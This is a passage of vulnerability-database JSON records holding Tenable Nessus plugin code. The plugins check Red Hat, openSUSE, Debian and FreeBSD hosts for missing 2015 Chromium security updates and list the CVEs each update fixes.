script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/05/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:1023\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-43.0.2357.65-1.el6_6\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-43.0.2357.65-1.el6_6\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-debuginfo-43.0.2357.65-1.el6_6\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-debuginfo-43.0.2357.65-1.el6_6\", allowmaj:TRUE)) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium-browser / chromium-browser-debuginfo\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:45:47", "description": "Chromium was updated to 43.0.2357.65 to fix security issues and bugs.\n\nThe following vulnerabilities were fixed :\n\n - CVE-2015-1251: Use-after-free in Speech (boo#931659)\n\n - CVE-2015-1252: Sandbox escape in Chrome (boo#931671)\n\n - CVE-2015-1253: Cross-origin bypass in DOM (boo#931670)\n\n - CVE-2015-1254: Cross-origin bypass in Editing (boo#931669)\n\n - CVE-2015-1255: Use-after-free in WebAudio (boo#931674)\n\n - CVE-2015-1256: Use-after-free in SVG (boo#931664)\n\n - CVE-2015-1257: Container-overflow in SVG (boo#931665)\n\n - CVE-2015-1258: Negative-size parameter in Libvpx (boo#931666)\n\n - CVE-2015-1259: Uninitialized value in PDFium (boo#931667)\n\n - CVE-2015-1260: Use-after-free in WebRTC (boo#931668)\n\n - CVE-2015-1261: URL bar spoofing (boo#931673)\n\n - CVE-2015-1262: Uninitialized value in Blink (boo#931672)\n\n - CVE-2015-1263: Insecure download of spellcheck dictionary (boo#931663)\n\n - CVE-2015-1264: Cross-site scripting in bookmarks (boo#931661)\n\n - CVE-2015-1265: Various fixes from internal audits, fuzzing and other initiatives (boo#931660)\n\n - Multiple vulnerabilities in V8 fixed at the tip of the 4.3 branch (currently 4.3.61.21)", "cvss3": {"score": null, "vector": null}, "published": "2015-06-01T00:00:00", "type": "nessus", "title": "openSUSE Security Update : Chromium (openSUSE-2015-390)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1251", "CVE-2015-1252", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1255", "CVE-2015-1256", "CVE-2015-1257", "CVE-2015-1258", "CVE-2015-1259", "CVE-2015-1260", "CVE-2015-1261", "CVE-2015-1262", "CVE-2015-1263", "CVE-2015-1264", "CVE-2015-1265"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debuginfo", "p-cpe:/a:novell:opensuse:chromium-debugsource", "p-cpe:/a:novell:opensuse:chromium-desktop-gnome", "p-cpe:/a:novell:opensuse:chromium-desktop-kde", "p-cpe:/a:novell:opensuse:chromium-ffmpegsumo", "p-cpe:/a:novell:opensuse:chromium-ffmpegsumo-debuginfo", "cpe:/o:novell:opensuse:13.1", "cpe:/o:novell:opensuse:13.2"], "id": "OPENSUSE-2015-390.NASL", "href": "https://www.tenable.com/plugins/nessus/83915", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-390.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83915);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-1251\", \"CVE-2015-1252\", \"CVE-2015-1253\", \"CVE-2015-1254\", \"CVE-2015-1255\", \"CVE-2015-1256\", \"CVE-2015-1257\", \"CVE-2015-1258\", \"CVE-2015-1259\", \"CVE-2015-1260\", \"CVE-2015-1261\", \"CVE-2015-1262\", \"CVE-2015-1263\", \"CVE-2015-1264\", \"CVE-2015-1265\");\n\n script_name(english:\"openSUSE Security Update : Chromium (openSUSE-2015-390)\");\n script_summary(english:\"Check for the openSUSE-2015-390 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Chromium was updated to 43.0.2357.65 to fix security issues and bugs.\n\nThe following vulnerabilities were fixed :\n\n - CVE-2015-1251: Use-after-free in Speech (boo#931659)\n\n - CVE-2015-1252: Sandbox escape in Chrome (boo#931671)\n\n - CVE-2015-1253: Cross-origin bypass in DOM (boo#931670)\n\n - CVE-2015-1254: Cross-origin bypass in Editing\n (boo#931669)\n\n - CVE-2015-1255: Use-after-free in WebAudio (boo#931674)\n\n - CVE-2015-1256: Use-after-free in SVG (boo#931664)\n\n - CVE-2015-1257: Container-overflow in SVG (boo#931665)\n\n - CVE-2015-1258: Negative-size parameter in Libvpx\n (boo#931666)\n\n - CVE-2015-1259: Uninitialized value in PDFium\n (boo#931667)\n\n - CVE-2015-1260: Use-after-free in WebRTC (boo#931668)\n\n - CVE-2015-1261: URL bar spoofing (boo#931673)\n\n - CVE-2015-1262: Uninitialized value in Blink (boo#931672)\n\n - CVE-2015-1263: Insecure download of spellcheck\n dictionary (boo#931663)\n\n - CVE-2015-1264: Cross-site scripting in bookmarks\n (boo#931661)\n\n - CVE-2015-1265: Various fixes from internal audits,\n fuzzing and other initiatives (boo#931660)\n\n - Multiple vulnerabilities in V8 fixed at the tip of the\n 4.3 branch (currently 4.3.61.21)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=931659\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=931660\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=931661\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=931663\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=931664\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=931665\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=931666\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=931667\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=931668\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=931669\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=931670\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=931671\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=931672\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=931673\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=931674\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected Chromium packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-desktop-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-desktop-kde\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-ffmpegsumo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-ffmpegsumo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1|SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1 / 13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromedriver-43.0.2357.65-84.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromedriver-debuginfo-43.0.2357.65-84.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-43.0.2357.65-84.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-debuginfo-43.0.2357.65-84.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-debugsource-43.0.2357.65-84.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-desktop-gnome-43.0.2357.65-84.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-desktop-kde-43.0.2357.65-84.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-ffmpegsumo-43.0.2357.65-84.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-ffmpegsumo-debuginfo-43.0.2357.65-84.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromedriver-43.0.2357.65-29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromedriver-debuginfo-43.0.2357.65-29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-43.0.2357.65-29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-debuginfo-43.0.2357.65-29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-debugsource-43.0.2357.65-29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-desktop-gnome-43.0.2357.65-29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-desktop-kde-43.0.2357.65-29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-ffmpegsumo-43.0.2357.65-29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-ffmpegsumo-debuginfo-43.0.2357.65-29.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:45:57", "description": "Several vulnerabilities were discovered in the chromium web browser.\n\n - CVE-2015-1251 SkyLined discovered a use-after-free issue in speech recognition.\n\n - CVE-2015-1252 An out-of-bounds write issue was discovered that could be used to escape from the sandbox.\n\n - CVE-2015-1253 A cross-origin bypass issue was discovered in the DOM parser.\n\n - CVE-2015-1254 A cross-origin bypass issue was discovered in the DOM editing feature.\n\n - CVE-2015-1255 Khalil Zhani discovered a use-after-free issue in WebAudio.\n\n - CVE-2015-1256 Atte Kettunen discovered a use-after-free issue in the SVG implementation.\n\n - CVE-2015-1257 miaubiz discovered an overflow issue in the SVG implementation.\n\n - CVE-2015-1258 cloudfuzzer discovered an invalid size parameter used in the libvpx library.\n\n - CVE-2015-1259 Atte Kettunen discovered an uninitialized memory issue in the pdfium library.\n\n - CVE-2015-1260 Khalil Zhani discovered multiple use-after-free issues in chromium's interface to the WebRTC library.\n\n - CVE-2015-1261 Juho Nurminen discovered a URL bar spoofing issue.\n\n - CVE-2015-1262 miaubiz discovered the use of an uninitialized class member in font handling.\n\n - CVE-2015-1263 Mike Ruddy discovered that downloading the spellcheck dictionary was not done over HTTPS.\n\n - CVE-2015-1264 K0r3Ph1L discovered a cross-site scripting issue that could be triggered by bookmarking a site.\n\n - CVE-2015-1265 The chrome 43 development team found and fixed various issues during internal auditing. Also multiple issues were fixed in the libv8 library, version 4.3.61.21.", "cvss3": {"score": null, "vector": null}, "published": "2015-05-26T00:00:00", "type": "nessus", "title": "Debian DSA-3267-1 : chromium-browser - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1251", "CVE-2015-1252", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1255", "CVE-2015-1256", "CVE-2015-1257", "CVE-2015-1258", "CVE-2015-1259", "CVE-2015-1260", "CVE-2015-1261", "CVE-2015-1262", "CVE-2015-1263", "CVE-2015-1264", "CVE-2015-1265"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:chromium-browser", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DSA-3267.NASL", "href": "https://www.tenable.com/plugins/nessus/83784", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3267. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83784);\n script_version(\"2.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-1251\", \"CVE-2015-1252\", \"CVE-2015-1253\", \"CVE-2015-1254\", \"CVE-2015-1255\", \"CVE-2015-1256\", \"CVE-2015-1257\", \"CVE-2015-1258\", \"CVE-2015-1259\", \"CVE-2015-1260\", \"CVE-2015-1261\", \"CVE-2015-1262\", \"CVE-2015-1263\", \"CVE-2015-1264\", \"CVE-2015-1265\");\n script_bugtraq_id(74723, 74727);\n script_xref(name:\"DSA\", value:\"3267\");\n\n script_name(english:\"Debian DSA-3267-1 : chromium-browser - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities were discovered in the chromium web browser.\n\n - CVE-2015-1251\n SkyLined discovered a use-after-free issue in speech\n recognition.\n\n - CVE-2015-1252\n An out-of-bounds write issue was discovered that could\n be used to escape from the sandbox.\n\n - CVE-2015-1253\n A cross-origin bypass issue was discovered in the DOM\n parser.\n\n - CVE-2015-1254\n A cross-origin bypass issue was discovered in the DOM\n editing feature.\n\n - CVE-2015-1255\n Khalil Zhani discovered a use-after-free issue in\n WebAudio.\n\n - CVE-2015-1256\n Atte Kettunen discovered a use-after-free issue in the\n SVG implementation.\n\n - CVE-2015-1257\n miaubiz discovered an overflow issue in the SVG\n implementation.\n\n - CVE-2015-1258\n cloudfuzzer discovered an invalid size parameter used in\n the libvpx library.\n\n - CVE-2015-1259\n Atte Kettunen discovered an uninitialized memory issue\n in the pdfium library.\n\n - CVE-2015-1260\n Khalil Zhani discovered multiple use-after-free issues\n in chromium's interface to the WebRTC library.\n\n - CVE-2015-1261\n Juho Nurminen discovered a URL bar spoofing issue.\n\n - CVE-2015-1262\n miaubiz discovered the use of an uninitialized class\n member in font handling.\n\n - CVE-2015-1263\n Mike Ruddy discovered that downloading the spellcheck\n dictionary was not done over HTTPS.\n\n - CVE-2015-1264\n K0r3Ph1L discovered a cross-site scripting issue that\n could be triggered by bookmarking a site.\n\n - CVE-2015-1265\n The chrome 43 development team found and fixed various\n issues during internal auditing. Also multiple issues\n were fixed in the libv8 library, version 4.3.61.21.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1251\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1252\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1253\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1254\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1255\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1256\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1257\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1258\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1259\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1260\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1261\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1262\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1263\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1264\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1265\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/chromium-browser\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2015/dsa-3267\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the chromium-browser packages.\n\nFor the stable distribution (jessie), these problems have been fixed\nin version 43.0.2357.65-1~deb8u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-browser\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/05/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"chromedriver\", reference:\"43.0.2357.65-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"chromium\", reference:\"43.0.2357.65-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"chromium-dbg\", reference:\"43.0.2357.65-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"chromium-inspector\", reference:\"43.0.2357.65-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"chromium-l10n\", reference:\"43.0.2357.65-1~deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:46:06", "description": "Google Chrome Releases reports :\n\n45 new security fixes, including :\n\n- [456518] High CVE-2015-1235: Cross-origin-bypass in HTML parser.\nCredit to anonymous.\n\n- [313939] Medium CVE-2015-1236: Cross-origin-bypass in Blink. Credit to Amitay Dobo.\n\n- [461191] High CVE-2015-1237: Use-after-free in IPC. Credit to Khalil Zhani.\n\n- [445808] High CVE-2015-1238: Out-of-bounds write in Skia. Credit to cloudfuzzer.\n\n- [463599] Medium CVE-2015-1240: Out-of-bounds read in WebGL. Credit to w3bd3vil.\n\n- [418402] Medium CVE-2015-1241: Tap-Jacking. Credit to Phillip Moon and Matt Weston of Sandfield Information Systems.\n\n- [460917] High CVE-2015-1242: Type confusion in V8. Credit to fcole@onshape.com.\n\n- [455215] Medium CVE-2015-1244: HSTS bypass in WebSockets. Credit to Mike Ruddy.\n\n- [444957] Medium CVE-2015-1245: Use-after-free in PDFium. Credit to Khalil Zhani.\n\n- [437399] Medium CVE-2015-1246: Out-of-bounds read in Blink. Credit to Atte Kettunen of OUSPG.\n\n- [429838] Medium CVE-2015-1247: Scheme issues in OpenSearch. Credit to Jann Horn.\n\n- [380663] Medium CVE-2015-1248: SafeBrowsing bypass. Credit to Vittorio Gambaletta (VittGam).\n\n- [476786] CVE-2015-1249: Various fixes from internal audits, fuzzing and other initiatives. Multiple vulnerabilities in V8 fixed at the tip of the 4.2 branch (currently 4.2.77.14).", "cvss3": {"score": null, "vector": null}, "published": "2015-04-28T00:00:00", "type": "nessus", "title": "FreeBSD : chromium -- multiple vulnerabilities (b57f690e-ecc9-11e4-876c-00262d5ed8ee)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1235", "CVE-2015-1236", "CVE-2015-1237", "CVE-2015-1238", "CVE-2015-1240", "CVE-2015-1241", "CVE-2015-1242", "CVE-2015-1244", "CVE-2015-1245", "CVE-2015-1246", "CVE-2015-1247", "CVE-2015-1248", "CVE-2015-1249"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:chromium", "p-cpe:/a:freebsd:freebsd:chromium-npapi", "p-cpe:/a:freebsd:freebsd:chromium-pulse", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_B57F690EECC911E4876C00262D5ED8EE.NASL", "href": "https://www.tenable.com/plugins/nessus/83095", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER 